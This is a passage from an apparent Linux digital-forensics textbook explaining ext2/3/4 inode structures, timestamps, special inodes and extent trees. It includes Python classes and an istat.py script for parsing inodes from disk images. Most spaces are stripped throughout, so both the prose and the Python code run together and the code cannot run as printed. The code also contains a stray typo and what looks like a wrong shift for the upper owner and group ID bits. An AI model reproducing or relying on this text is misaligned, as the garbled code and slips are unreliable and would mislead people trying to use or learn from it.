Aftertheifblock(whichisonlyrununtilwefindourfirstfile),thelineq=$(echo$line|awk‘{print$1}’)setsthevalueofqequaltotheinodenumberforthecurrent line. If startinode is less than the current inode number, a warning message isprinted. The nestedif/else statement is used to print amessage in red if the inodenumber jumpedupbymore than two.Otherwise themessage is printed in yellow.Thefunny characters in the echo statements are called escape sequences. The -e option toechoisneededtohaveechoevaluatetheescapesequences(whichbeginwith\e)ratherthanjustprintouttherawcharacters.Ifthemessagewasdisplayed,thestartinodevariableisresettothecurrentinodenumber.

Regardlessofwhetherornotamessagewasprinted,thelineisechoed.Thestartinodevariableisincrementedonthelinestartinode=$((startinode+1)).Recall that$(())isusedtocausebashtoevaluatewhatiscontainedintheparenthesesinmathmode.This iswhywehad todeclarestartinodeasan integerearlier in thescript.Only integer

values can be incremented like this.When the loop exits, the temporary file is deleted.Partial results of running this script against the PFE subject system’s /bin directory areshowninFigure7.19.Noticetheredwarningsbeforetherootkitfiles.

FIGURE7.19

Partial results of running out-of-seq-inode.sh against the PFE subject system’s /bin directory. Note thewarningfortherootkitfiles.

INODESNowthatwehavehadalittlebreakfromtheoryandhadourfunwithsomescripting,itistimetogetbacktolearningmoreaboutthekeepersofthemetadata,theinodes.Forext2andext3filesystemstheinodesare128byteslong.Asofthiswritingtheext4filesystemuses156byte inodes,but it allocates256byteson thedisk.This extra100bytes is forfutureexpansionandmayalsobeusedforstorageaswewillseelaterinthischapter.

In order to use inodes youmust first find them. The block group associatedwith aninodeiseasilycalculatedusingthefollowingformula:

blockgroup=(inodenumber–1)/(inodespergroup)

Obviouslyintegerdivisionshouldbeusedhereasblockgroupsareintegers.Oncethecorrectblockgrouphasbeenlocated,theindexwithintheblockgroupsinodetablemustbecalculated.Thisiseasilydonewiththemodulusoperator.Recallthatxmodygivestheremainderwhenperformingtheintegerdivisionx/y.Theformulafortheindexissimply:

index=(inodenumber–1)mod(inodespergroup)

Finally,theoffsetintotheinodetableisgivenby:

offset=index*(inodesizeondisk)

The inode structure is summarized in Table 7.5. Most of these fields are self-explanatory.Thosethatarenotwillbedescribedinmoredetailinthissection.

Therearetwooperatingsystemdependentunions(OSDs)intheinode.ThesewillvaryfromwhatisdescribedhereifyourfilesystemcomesfromHurdorBSD.ThefirstOSDforfilesystemscreatedbyLinuxholdstheinodeversion.ForextendedfilesystemscreatedbyLinux,thesecondOSDcontainstheupper16bitsofseveralvalues.

Theblockarraystoresfifteen32-bitblockaddresses.If thiswasusedtodirectlystoreblocks that make up a file, it would be extremely limiting. For example, if 4-kilobyteblocksareinuse,fileswouldbelimitedto60kilobytes!Thisisnothowthisarrayisused,however.Thefirsttwelveentriesaredirectblockentrieswhichcontaintheblocknumbersforthefirsttwelvedatablocks(48kBwhenusing4kBblocks)thatmakeupafile.Ifmorespaceisrequired,thethirteenthentryhastheblocknumberforasinglyindirectblock.Thesinglyindirectblockisadatablockthatcontainsalistofdatablocksthatmakeupafile.If the block size is 4 kB the singly indirect block can point to 1024 data blocks. Themaximumamount that canbe storedusing singly indirectblocks is then (sizeof adatablock)*(numberofblockaddressesthatcanbestoredinadatablock)or(4kB)*(1024)whichequals4megabytes.

Forfilestoolargetobestoredwithdirectblocksandsinglyindirectblocks(48kB+4MB), the fourteenth entry contains the block number for a doubly indirect block. Thedoublyindirectblockpoints toablockthatcontainsa listofsingly indirectblocks.Thedoubly indirect blocks can store 1024 times as much as singly indirect blocks (againassuming4kBblocks)whichmeansthatfilesaslargeas(48kB+4MB+4GB)canbeaccommodated.Ifthisisstillnotenoughspace,thefinalentrycontainsapointertotriplyindirectblocksallowingfilesaslargeas(48kB+4MB+4GB+4TB)tobestored.ThisblocksystemisillustratedinFigure7.20.

FIGURE7.20

Datablocksininodeblockarray.

Ifyouare lookingat anext2or ext3 filesystem, then theabove listof inode fields iscomplete. For ext4 filesystems the fields in Table 7.6. have been added.Most of thesefieldsareextratimebits.

Table7.5.Inodestructure.

Offset Size Name Description

0x0 2 FileMode Filemodeandtype

0x2 2 UID Lower16bitsofownerID

0x4 4 Sizelo Lower32bitsoffilesize

0x8 4 Atime Accesstimeinsecondssinceepoch

0xC 4 Ctime Changetimeinsecondssinceepoch

0x10 4 Mtime Modifytimeinsecondssinceepoch

0x14 4 Dtime Deletetimeinsecondssinceepoch

0x18 2 GID Lower16bitsofgroupID

0x1A 2 Hlinkcount Hardlinkcount

0x1C 4 Blockslo Lower32bitsofblockcount

0x20 4 Flags Flags

0x24 4 Unionosd1 Linux:lversion

0x28 60 Block[15] 15pointerstodatablocks

0x64 4 Version FileversionforNFS

0x68 4 FileACLlow Lower32bitsofextendedattributes(ACL,etc)

0x6C 4 Filesizehi Upper32bitsoffilesize(ext4only)

0x70 4 Obsoletefragment Anobsoletedfragmentaddress

0x74 12 Osd2 Secondoperatingsystemdependentunion

0x74 2 Blockshi Upper16bitsofblockcount

0x76 2 FileACLhi Upper16bitsofextendedattributes(ACL,etc.)

0x78 2 UIDhi Upper16bitsofownerID

0x7A 2 GIDhi Upper16bitsofgroupID

0x7C 2 Checksumlo Lower16bitsofinodechecksum

Table7.6.Extrainodefieldsinext4filesystems.

Offset Size Name Description

0x80 2 Extrasize Howmanybytesbeyondstandard128areused

0x82 2 Checksumhi Upper16bitsofinodechecksum

0x84 4 Ctimeextra Changetimeextrabits

0x88 4 Mtimeextra Modifytimeextrabits

0x8C 4 Atimeextra Accesstimeextrabits

0x90 4 Crtime Filecreatetime(secondssinceepoch)

0x94 4 Crtimeextra Filecreatetimeextrabits

0x98 4 Versionhi Upper32bitsofversion

0x9C Unused Reservedspaceforfutureexpansions

Awordabout theextra timebits is inorder.Linuxisfacingaseriousproblem.In theyear 2038 the 32-bit timestampswill roll over.While that is over two decades away, asolutionisalreadyinplace(HurrayforOpenSource!).Thesolutionistoexpandthe32-bit time structure to 64 bits. In order to prevent backward compatibility problems theoriginal32-bittimestructure(storedinfirst128bytesofinodes)remainsunchanged;itisstilljustsecondssincetheepochonJanuary1,1970.Thelowertwobitsofthisextrafieldareusedtoextendthe32-bitsecondscounterto34bitswhichmakeseverythinggooduntiltheyear2446.Theupperthirtybitsoftheextrafieldareusedtostorenanoseconds.

Thisnanosecondaccuracyisadreamforforensicinvestigators.Bywayofcomparison,Windows FAT filesystems provide only a two second resolution and even the latestversionofNTFSonlyprovidesaccuracytothenearest100nanoseconds.ThisisanotherreasontousePythonandothertoolstoparsetheinodesasstandardtoolsdon’tnormallydisplaythecompletetimestamp.Thishighprecisionmakestimelineanalysiseasiersinceyoudonothavetoguesswhatchangedfirstinatwosecondinterval.

Thereareanumberofspecialinodes.ThesearesummarizedinTable7.7.Oftheinodeslisted, therootdirectory(inode2)andjournal(inode8)aresomeof themoreimportantonesforforensicinvestigators.

Table7.7.Specialpurposeinodes.

Inode SpecialPurpose

0 Nosuchinode,numberingsstartsat1

1 Defectiveblocklist

2 Rootdirectory

3 Userquotas

4 Groupquotas

5 Bootloader

6 Undeletedirectory

7 Reservedgroupdescriptors(forresizingfilesystem)

8 Journal

9 Excludeinode(forsnapshots)

10 Replicainode

11 Firstnon-reservedinode(oftenlost+found)

ReadinginodeswithPythonOnceagainwe turn toPython inorder toeasily interpret the inodedata.ToaccomplishthiswewilladdanewInodeclasstoourever-expandingextfs.pyfile.Thenewclassandhelperfunctionsfollow.“””

Thishelperfunctionparsesthemodebitvector

storedinaninode.Itacceptsa16-bitmode

bitvectorandreturnsalistofstrings.

“””

defgetInodeModes(mode):

retVal=[]

ifmode&0x1:

retVal.append(“OthersExec”)

ifmode&0x2:

retVal.append(“OthersWrite”)

ifmode&0x4:

retVal.append(“OthersRead”)

ifmode&0x8:

retVal.append(“GroupExec”)

ifmode&0x10:

retVal.append(“GroupWrite”)

ifmode&0x20:

retVal.append(“GroupRead”)

ifmode&0x40:

retVal.append(“OwnerExec”)

ifmode&0x80:

retVal.append(“OwnerWrite”)

ifmode&0x100:

retVal.append(“OwnerRead”)

ifmode&0x200:

retVal.append(“StickyBit”)

ifmode&0x400:

retVal.append(“SetGID”)

ifmode&0x800:

retVal.append(“SetUID”)

returnretVal

“””

Thishelperfunctionparsesthemodebitvector

storedinaninodeinordertogetfiletype.

Itacceptsa16-bitmodebitvectorand

returnsastring.

“””

defgetInodeFileType(mode):

fType=(mode&0xf000)>>12

iffType==0x1:

return“FIFO”

eliffType==0x2:

return“CharDevice”

eliffType==0x4:

return“Directory”

eliffType==0x6:

return“BlockDevice”

eliffType==0x8:

return“RegularFile”

eliffType==0xA:

return“SymbolicLink”

eliffType==0xc:

return“Socket”

else:

return“UnknownFiletype”

“””

Thishelperfunctionparsestheflagsbitvector

storedinaninode.Itacceptsa32-bitflags

bitvectorandreturnsalistofstrings.

“””

defgetInodeFlags(flags):

retVal=[]

ifflags&0x1:

retVal.append(“SecureDeletion”)

ifflags&0x2:

retVal.append(“PreserveforUndelete”)

ifflags&0x4:

retVal.append(“CompressedFile”)

ifflags&0x8:

retVal.append(“SynchronousWrites”)

ifflags&0x10:

retVal.append(“ImmutableFile”)

ifflags&0x20:

retVal.append(“AppendOnly”)

ifflags&0x40:

retVal.append(“DoNotDump”)

ifflags&0x80:

retVal.append(“DoNotUpdateAccessTime”)

ifflags&0x100:

retVal.append(“DirtyCompressedFile”)

ifflags&0x200:

retVal.append(“CompressedClusters”)

ifflags&0x400:

retVal.append(“DoNotCompress”)

ifflags&0x800:

retVal.append(“EncryptedInode”)

ifflags&0x1000:

retVal.append(“DirectoryHashIndexes”)

ifflags&0x2000:

retVal.append(“AFSMagicDirectory”)

ifflags&0x4000:

retVal.append(“MustBeWrittenThroughJournal”)

ifflags&0x8000:

retVal.append(“DoNotMergeFileTail”)

ifflags&0x10000:

retVal.append(“DirectoryEntriesWrittenS2ynchronously”)

ifflags&0x20000:

retVal.append(“TopofDirectoryHierarchy”)

ifflags&0x40000:

retVal.append(“HugeFile”)

ifflags&0x80000:

retVal.append(“InodeusesExtents”)

ifflags&0x200000:

retVal.append(“LargeExtendedAttributeinInode”)

ifflags&0x400000:

retVal.append(“BlocksPastEOF”)

ifflags&0x1000000:

retVal.append(“InodeisSnapshot”)

ifflags&0x4000000:

retVal.append(“SnapshotisbeingDeleted”)

ifflags&0x8000000:

retVal.append(“SnapshotShrinkCompleted”)

ifflags&0x10000000:

retVal.append(“InlineData”)

ifflags&0x80000000:

retVal.append(“ReservedforExt4Library”)

ifflags&0x4bdfff:

retVal.append(“User-visibleFlags”)

ifflags&0x4b80ff:

retVal.append(“User-modifiableFlags”)

returnretVal

“””

Thishelperfunctionwillconvertaninode

numbertoablockgroupandindexwiththe

blockgroup.

Usage:[bg,index]=getInodeLoc(inodeNo,inodesPerGroup)

“””

defgetInodeLoc(inodeNo,inodesPerGroup):

bg=(int(inodeNo)-1)/int(inodesPerGroup)

index=(int(inodeNo)-1)%int(inodesPerGroup)

return[bg,index]

“””

ClassInode.Thisclassstoresextendedfilesystem

inodeinformationinanorderlymannerandprovides

ahelperfunctionforprettyprinting.Theconstructoraccepts

apackedstringcontainingtheinodedataandinodesize

whichisdefaultedto128bytesasusedbyext2andext3.

Forinodes>128bytestheextrafieldsaredecoded.

Usageinode=Inode(dataInPackedString,inodeSize)

inode.prettyPrint()

“””

classInode():

def__init__(self,data,inodeSize=128):

#storeboththerawmodebitvectorandinterpretation

self.mode=getU16(data)

self.modeList=getInodeModes(self.mode)

self.fileType=getInodeFileType(self.mode)

self.ownerID=getU16(data,0x2)

self.fileSize=getU32(data,0x4)

#gettimesinsecondssinceepoch

#note:thesewillrolloverin2038withoutextra

#bitsstoredintheextrainodefieldsbelow

self.accessTime=time.gmtime(getU32(data,0x8))

self.changeTime=time.gmtime(getU32(data,0xC))

self.modifyTime=time.gmtime(getU32(data,0x10))

self.deleteTime=time.gmtime(getU32(data,0x14))

self.groupID=getU16(data,0x18)

self.links=getU16(data,0x1a)

self.blocks=getU32(data,0x1c)

#storeboththerawflagsbitvectorandinterpretation

self.flags=getU32(data,0x20)

self.flagList=getInodeFlags(self.flags)

#high32-bitsofgenerationforLinux

self.osd1=getU32(data,0x24)

#storethe15valuesfromtheblockarray

#note:thesemaynotbeactualblocksif

#certainfeatureslikeextentsareenabled

self.block=[]

foriinrange(0,15):

self.block.append(getU32(data,0x28+i*4))

self.generation=getU32(data,0x64)

#themostcommonextenedattributesareACLs

#butotherEAsarepossible

self.extendAttribs=getU32(data,0x68)

self.fileSize+=pow(2,32)*getU32(data,0x6c)

#thesearetechnicallyonlycorrectforLinuxext4filesystems

#shouldprobablyverifythatthatisthecase

self.blocks+=getU16(data,0x74)*pow(2,32)

self.extendAttribs+=getU16(data,0x76)*pow(2,32)

self.ownerID+=getU16(data,0x78)*pow(2,32)

self.groupID+=getU16(data,0x7a)*pow(2,32)

self.checksum=getU16(data,0x7c)

#ext4uses256byteinodesonthedisk

#asofJuly2015thelogicalsizeis156bytes

#thefirstwordisthesizeoftheextrainfo

ifinodeSize>128:

self.inodeSize=128+getU16(data,0x80)

#thisistheupperwordofthechecksum

ifself.inodeSize>0x82:

self.checksum+=getU16(data,0x82)*pow(2,16)

#theseextrabitsgivenanosecondaccuracyoftimestamps

#thelower2bitsareusedtoextendthe32-bitseconds

#sincetheepochcounterto34bits

#ifyouarestillusingthisscriptin2038youshould

#adjustthisscriptaccordingly:-)

ifself.inodeSize>0x84:

self.changeTimeNanosecs=getU32(data,0x84)>>2

ifself.inodeSize>0x88:

self.modifyTimeNanosecs=getU32(data,0x88)>>2

ifself.inodeSize>0x8c:

self.accessTimeNanosecs=getU32(data,0x8c)>>2

ifself.inodeSize>0x90:

self.createTime=time.gmtime(getU32(data,0x90))

self.createTimeNanosecs=getU32(data,0x94)>>2

else:

self.createTime=time.gmtime(0)

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

printk+”:”,v

Thefirstthreehelperfunctionsarestraightforward.Thelinereturn[bg,index]ingetInodeLocisthePythonwayofreturningmorethanonevaluefromafunction.We

havereturnedlists(usuallyofstrings)before,butthesyntaxhereisslightlydifferent.

ThereissomethingnewintheInodeclass.Wheninterpretingtheextratimestampbits,the right shiftoperator (>>)hasbeenused.Writingx>>y causes thebits inx tobeshiftedyplaces to the right.By shiftingeverything twobits to the rightwediscard thelower two bits which are used to extend the seconds counter (which should not be aproblemuntil2038)andeffectivelydivideour32-bitvaluebyfour.Theshiftoperatorsarevery fast and efficient. Incidentally, the left shift operator (<<) is used to shift bits theotherdirection(multiplication).

Ascriptnamedistat.pyhasbeencreated.ItsfunctionalityissimilartothatoftheistatutilityfromTheSleuthKit.Itexpectsanimagefile,offsettothestartofafilesysteminsectors,andaninodenumberasinputs.Thescriptfollows.#!/usr/bin/python

#

#istat.py

#

#ThisisasimplePythonscriptthatwill

#printoutmetadatainaninodefromanext2/3/4filesysteminside

#ofanimagefile.

#

#DevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

importextfs

importsys

importos.path

importsubprocess

importstruct

importtime

frommathimportlog

defusage():

print(“usage“+sys.argv[0]+\

“<imagefile><offset><inodenumber>\n”+

“Displaysinodeinformationfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopennedforreading”)

exit(1)

emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])

#getinodelocation

inodeLoc=extfs.getInodeLoc(sys.argv[3],\

emd.superblock.inodesPerGroup)

offset=emd.bgdList[inodeLoc[0]].inodeTable\

*emd.superblock.blockSize+\

inodeLoc[1]*emd.superblock.inodeSize

withopen(str(sys.argv[1]),‘rb’)asf:

f.seek(offset+int(sys.argv[2])*512)

data=str(f.read(emd.superblock.inodeSize))

inode=extfs.Inode(data,emd.superblock.inodeSize)

print“Inode%sinBlockGroup%satindex%s”%(str(sys.argv[3]),\

str(inodeLoc[0]),str(inodeLoc[1]))

inode.prettyPrint()

if__name__==“__main__”:

main()

Inthisscriptwehaveimportedtheextfs.pyfilewiththelineimportextfs.Noticethatthereisnofileextensionintheimportstatement.Thescriptisstraightforward.Weseethetypicalusagefunctionthatiscalledifinsufficientparametersarepassedintothescript.An extended metadata object is created, then the location of the inode in question iscalculated.Oncethelocationisknown,theinodedataisretrievedfromthefileandusedto create an inode object which is printed to the screen. Notice that “extfs.” must beprependedtothefunctionnamesnowthatwearecallingcodeoutsideofthecurrentfile.Wecouldavoidthisbychangingtheimportstatementtofromextfsimport*,butIdidnotdosoasIfeelhavingthe“extfs.”makesthecodeclearer.

Resultsof running thisnewscript againstoneof the interesting inodes from thePFEsubjectsystemimageareshowninFigure7.21.Acoupleofthingsaboutthisinodeshouldbenoted.First,theflagsindicatethatthisinodeusesextentswhichmeanstheblockarrayhas a different interpretation (more about this later in this chapter). Second, this inodecontains a creation time.Because this is a new field only available in ext4 filesystems,manytools,includingthoseforalteringtimestamps,donotchangethisfield.Obviously,this unaltered timestamp is good data for the forensic investigator. Now that we havelearnedaboutthegenericinodes,wearereadytomoveontoadiscussionofsomeinodeextensionsthatwillbepresentifthefilesystemhascertainfeaturesenabled.

FIGURE7.21

Resultsofrunningistat.pyonaninodeassociatedwitharootkitonthePFEsubjectsystem.

InodeextensionsanddetailsYoumayhavenoticedfromthescriptintheprevioussectionthatthefilemodebitvector

in the inode contains more that just the file mode. In addition to the standard modeinformation which may be changed via the chmod command, the type of file is alsostored.ThefilemodebitvectorissumarizedinTable7.8.

Table7.8.Filemodebitvectorfromtheinode.Boldeditemsaremutuallyexclusive.

15 14 13 12 11 10 9 8

RegularorSimlinkw/13orSocketw/14

DirectoryorBlockDevw/Bit13

CharDeviceorBlockw/Bit14

FIFO SetUID

SetGID

StickyBit

OwnerRead

7 6 5 4 3 2 1 0

OwnerWrite OwnerExecute GroupRead GroupWrite GroupExecute OthersRead OthersWrite OthersExecute

Upon examiningTable 7.8, the lower twelve bits should look familiar as all of thesemodesmaybechangedvia thestandardLinuxchmod (changemode)command.Thesefilemodesarenotmutuallyexclusive.Theupperfourbitsareusedtospecifythefiletype.Eachfileisallowedonlyonetype.ThefiletypesarebrokenoutinTable7.9.

Table7.9.Decodingthefiletypefromtheupperfourbitsoftheinodefilemode.

BitfromInodeFileMode

Meaning 15 14 13 12

FIFO(pipe) 0 0 0 1

CharacterDevice 0 0 1 0

Directory 0 1 0 0

BlockDevice 0 1 1 0

RegularFile 1 0 0 0

SymbolicLink 1 0 1 0

Socket 1 1 0 0

Theinodecontainsa32-bitbitvectorofflags.ThelowerwordofflagsissummarizedinTable 7.10. Some flags may lack operating system support. Investigators familiar withWindows may know that there is a registry flag,HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate,whichcanbeusedtodisableaccesstimeupdatingonNTFSdirectories.Bit7,noaccesstimeupdating,providesasimilarfunctiononanextendedfilesystem,butattheindividualfileordirectorylevel.

Table7.10.Lowerwordofinodeflags.

15 14 13 12 11 10 9 8

Filetailnotmerged

Datawrittenthroughjournal

AFSMagic

Directoryhashashindexes

EncyrptedInode

Don’tcompressfile

Compressedclusters

Dirtycompressedfile

7 6 5 4 3 2 1 0

Noaccesstimeupdating

NoDump

AppendOnly

Fileisimmutable

SynchronousWrites

Fileiscompressed

Preserveforundelete

SecureDeletion

The highword of inode flags is summarized in Table 7.11.Most of these flags onlymakesenseinthecontextofext4optionalfeatures.Bit28,inodehasinlinedata,isusedtostoreverysmallfilesentirelywithintheinode.Thefirst60bytesarestoredintheblockarray(whichisnotneededtostoreblocks).Ifthefilegrowsbeyond60bytesuptoabout160bytes,bytes60anduparestoredinthespacebetweeninodes(currently100bytes).Ifthefileexceeds160bytes,allofthedataismovedtoaregularblock.

Table7.11.Upperwordofinodeflags.

31 30 29 28 27 26 25 24

ReservedforExt4library

Unused Unused Inodehasinlinedata

Snapshotshrinkcompleted

Snapshotisbeingdeleted

Unused Inodeissnapshot

23 22 21 20 19 18 17 16

Unused Blockspastendoffile(deprecated)

Inodestoreslargeextendedattribute

Unused Inodeusesextents

HugeFile

Topofdirectory

Directoryentrysyncwrites

Huge files specify their size in clusters, not blocks. The cluster size is stored in thesuperblockwhen huge files are present on a filesystem.Huge files require the Extentsfeature.Extentswillbediscussedindetaillaterinthischapter.Likein-linedata,extentsusethe60bytesintheblockarrayforadifferentpurpose.Wehavesaidthataninodeisthekeeperoffilemetadata.Inthenextsectionwewilldiscusshowtoretrieveafilebasedoninformationstoredintheinode.

GoingfromaninodetoafileWehavediscussedthefifteenentriesintheblockarrayandhowtheyareusedtospecifydata blocks which house a file. We have also seen that these sixty bytes may be re-purposedforcertaincases. If the inodestoresasymbolic linkandthe target is less thansixtybyteslongitwillbestoredintheblockarray.Ifthein-linedataflagisset,thefirstsixtybytesofafileareinthisspace.Wehavealsomentionedthatextentsusethisspacedifferently.

Whenparsinganinodeforthelistofblockscontainedinafile(ordirectory)inthemostgenericsituation(i.e.noextents),weread thefirst twelveentries in theblockarrayandaddanynon-zerovaluestoourlistofblocks.Ifthethirteenthentryisnon-zero,wereadintheblockwith theaddress stored therewhichcontainsa listofup to1024blocks.Anynon-zeroentriesfromthedatablockareaddedtoourlist.Thisallowsfilesaslargeas4megabytes+48kilobytestobehandled.

Ifthereisanentryinthefourteenthblockarrayitem,weloadthespecifieddatablockwhichcontainsalistofdatablockswhichinturncontainlistsofdatablocks.Thereareupto1024*1024entriesinthisdoublyindirectlevelallofwhichpointto4kilobyteblockswhichallowfilesaslargeas4gigabytes+4megabytes+48kilobytestobehandled.Ifthis isstillnotenough, the lastentry is fora triply indirectblockwhichpermits filesaslargeas4terabytes+4gigabytes+4megabytes+48kilobytes,atleastintheory.Ifyouhaveanext4filesystem,itismuchmorelikelytouseextentswhicharediscussedinthenextsection.

Extents

Thesystemforstoringlistsofdatablocksdescribedintheprevioussectionisfinewhenmostfilesaresmall.Whenfilesizesaremeasuredinmegabytes,gigabytes,orterabytes,performancequicklybecomesanissue,however.Tobefair,theLinuxextendedfilesystemhas been around for decades and yet is perfectly acceptable as is formany users. Theelegantsolutiontoimproveperformanceforlargefilesistheuseofextents.

Extents store listsof contiguousblocks ina tree structure.Those familiarwithNTFSwillknowthatitusesalistofdataruns(contiguousclusters)inasimilarmanner.AswithmostthingsinLinux,storingblocklistsinatreeismuchmoreefficientthanthesimplelistusedinWindows.Threetypesofstructuresarerequiredtobuildanextenttree.Everyextenttreenodemusthaveaheaderthatindicateswhatisstoredinthenode.Thetopnodeofatreeisoftenreferredtoastherootnode.Therootnodeheaderisalwaysstoredatthestartoftheinodeblockarray.Allnon-emptyextenttreesmusthaveatleastoneleafnodewhich is called an extent (which is essentially equivalent to theNTFSdata run).Theremaybemiddlenodesbetweentherootnodeandleafnodeswhicharecalledindexes.Allthreetypesofstructureshavealengthof12byteswhichallowstherootnodeheaderplusfourentriestobestoredintheinodeblockarray.

TheextentheaderissummarizedinTable7.12.Theheaderbeginswithamagicnumberwhichisadouble-checkthatwhatfollowsisnotatraditionaldirectdatablockentry.Ifthedepth is zero, the entries that follow the header in this node are leaf nodes (extents).Otherwisetheentriesareforindex(middle)nodes.Ifyouworkoutthemath,storingthelargestfilesupportedbyext4shouldneverrequiremorethanfivelevelsinthetree.

Table7.12.Extentheaderformat.

Offset Size Name Description

0x0 2 Magic Magicnumber0xF30A

0x2 2 Entries Entriesthatfollowtheheader

0x4 2 MaxEntries Maximumnumberofentriesthatmightfollowheader

0x6 2 Depth 0=thisnodepointstodatablocks1-5=thisnodepointstootherotherextents

0x8 4 Generation Generationofthetree

TheextentindexnodeentryissummarizedinTable7.13.Theblockinthefirstfieldisalogicalblocknumber(thefileiscontainedinlogicalblockzerothroughtotalblocksminusone).For those familiarwithNTFS, this is similar toaVirtualClusterNumber (VCN).Theonlyrealdatainanindexnodeisa48-bitblockaddressforthenodeonelevellowerinthetree.

Table7.13.Extentindexformat.

Offset Size Name Description

0x0 4 Block Thisnodecoversblockxandfollowing

0x4 4 Leaflo Lower32bitsofblockcontainingthenode(leaforanotherindex)onelevellowerintree

0x8 2 Leafhi Upper16bitsoftheblockdescribedabove

0xA 2 Unused Paddingto12bytesize

Theextent(leaf)nodeentryissummarizedinTable7.14.Aswiththeindexnode,thefirstfieldisalogicalblocknumber.Thisisfollowedbyalength.Thislengthisnormallyless than 32,768.However, if uninitialized blocks are supported on this filesystem (saywith the lazyblockgroup feature), a valuegreater than32,768 indicates that the extentconsists of (32,768 – length) uninitialized data blocks.This is not common.The extentendswitha48-bitdatablockaddressforthefirstblockinthisextent.

Table7.14.Extentnodeformat.

Offset Size Name Description

0x0 4 Block Firstblockcoveredbythisextent

0x4 2 Len If<=32768initializedblocksinextentIf>32768extentsis(len-32768)uninitblocks

0x6 2 Starthi Upper16bitsofthestartingblock

0x8 4 Startlo Lower32bitsofthestartingblock

Basedonwhatwehavelearnedaboutextents,wecanupdateourextfs.pyandistat.pyfiles tomoreaccurately reportwhat is stored in the inodeblockarraywhenextents arebeingused. I shouldpointout that if therearemultiple levels in theextent tree that theentiretreewillnotbeprintedout,onlythefourentriesfromtheinodeblockarraywillbeincluded.Thereasonsforthisisthatparsingamulti-leveltreerequiresdatablockstoberead.Thisisnotasbigofanissueasitmightseematfirst.Fourleafnodesstoring32,768blockextentspermitfilesaslargeas32,768*4*4096or536,870,912bytes(512MB)tobestoredentirelywithintheinodeblockarray.Thefollowingcode,containingthreesmallclassesandahelperfunction,needstobeaddedtoourextfs.pyfile.“””

ClassExtentHeader.Parsesthe12-byteextent

headerthatispresentineveryextentnode

inaLinuxext4filesysteminodewiththeextent

flagset.Acceptsa12-bytepackedstring.

Usage:eh=ExtentHeader(data)

eh.prettyPrint()

“””

classExtentHeader():

def__init__(self,data):

self.magic=getU16(data)

self.entries=getU16(data,0x2)

self.max=getU16(data,0x4)

self.depth=getU16(data,0x6)

self.generation=getU32(data,0x8)

defprettyPrint(self):

print(“Extentdepth:%sentries:%smax-entries:%sgeneration:%s”\

%(self.depth,self.entries,self.max,self.generation))

“””

ClassExtentIndex.Representsamiddle

orindexnodeinanextenttree.Accepts

a12-bytepackedstringcontainingtheindex.

Usage:ei=ExtentIndex(data)

ei.prettyPrint()

“””

classExtentIndex():

def__init__(self,data):

self.block=getU32(data)

self.leafLo=getU32(data,0x4)

self.leafHi=getU16(data,0x8)

defprettyPrint(self):

print(“Indexblock:%sleaf:%s”\

%(self.block,self.leafHi*pow(2,32)+self.leafLo))

“””

ClassExtent.Representsaleafnode

orextentinanextenttree.Accepts

a12-bytepackedstringcontainingtheextent.

Usage:ext=Extent(data)

ext.prettyPrint()

“””

classExtent():

def__init__(self,data):

self.block=getU32(data)

self.len=getU16(data,0x4)

self.startHi=getU16(data,0x6)

self.startLo=getU32(data,0x8)

defprettyPrint(self):

print(“Extentblock:%sdatablocks:%s-%s”\

%(self.block,self.startHi*pow(2,32)+self.startLo,\

self.len+self.startHi*pow(2,32)+self.startLo-1))

“””

FunctiongetExtentTree(data).Thisfunction

willgetanextenttreefromthepassedin

packedstring.

Note1:Onlythedatapassedintothefunctionis

parsed.Ifthenodesareindexnodesthetreeis

nottraversed.

Note2:Inthemostcommoncasethedatapassedin

willbethe60bytesfromtheinodeblockarray.This

permitsfilesupto512MBtobestored.

“””

defgetExtentTree(data):

#firstentrymustbeaheader

retVal=[]

retVal.append(ExtentHeader(data))

ifretVal[0].depth==0:

#leafnode

foriinrange(0,retVal[0].entries):

retVal.append(Extent(data[(i+1)*12:]))

else:

#indexnodes

foriinrange(0,retVal[0].entries):

retVal.append(ExtentIndex(data[(i+1)*12:]))

returnretVal

Thiscodeusesnotechniquesthathavenotbeencoveredinthisbookthusfar.Wemustalsomodify the Inode class in order to handle the extents properly. The updated Inodeclassisshowninthefollowingcode.Newcodeisshowninbolditalics.“””

ClassInode.Thisclassstoresextendedfilesystem

inodeinformationinanorderlymannerandprovides

ahelperfunctionforprettyprinting.Theconstructoraccepts

apackedstringcontainingtheinodedataandinodesize

whichisdefaultedto128bytesasusedbyext2andext3.

Forinodes>128bytestheextrafieldsaredecoded.

Usageinode=Inode(dataInPackedString,inodeSize)

inode.prettyPrint()

“””

classInode():

def__init__(self,data,inodeSize=128):

#storeboththerawmodebitvectorandinterpretation

self.mode=getU16(data)

self.modeList=getInodeModes(self.mode)

self.fileType=getInodeFileType(self.mode)

self.ownerID=getU16(data,0x2)

self.fileSize=getU32(data,0x4)

#gettimesinsecondssinceepoch

#note:thesewillrolloverin2038withoutextra

#bitsstoredintheextrainodefieldsbelow

self.accessTime=time.gmtime(getU32(data,0x8))

self.changeTime=time.gmtime(getU32(data,0xC))

self.modifyTime=time.gmtime(getU32(data,0x10))

self.deleteTime=time.gmtime(getU32(data,0x14))

self.groupID=getU16(data,0x18)

self.links=getU16(data,0x1a)

self.blocks=getU32(data,0x1c)

#storeboththerawflagsbitvectorandinterpretation

self.flags=getU32(data,0x20)

self.flagList=getInodeFlags(self.flags)

#high32-bitsofgenerationforLinux

self.osd1=getU32(data,0x24)

#storethe15valuesfromtheblockarray

#note:thesemaynotbeactualblocksif

#certainfeatureslikeextentsareenabled

self.block=[]

self.extents=[]

ifself.flags&0x80000:

self.extents=getExtentTree(data[0x28:])

else:

foriinrange(0,15):

self.block.append(getU32(data,0x28+i*4))

self.generation=getU32(data,0x64)

#themostcommonextenedattributesareACLs

#butotherEAsarepossible

self.extendAttribs=getU32(data,0x68)

self.fileSize+=pow(2,32)*getU32(data,0x6c)

#thesearetechnicallyonlycorrectforLinuxext4filesystems

#shouldprobablyverifythatthatisthecase

self.blocks+=getU16(data,0x74)*pow(2,32)

self.extendAttribs+=getU16(data,0x76)*pow(2,32)

self.ownerID+=getU16(data,0x78)*pow(2,32)

self.groupID+=getU16(data,0x7a)*pow(2,32)

self.checksum=getU16(data,0x7c)
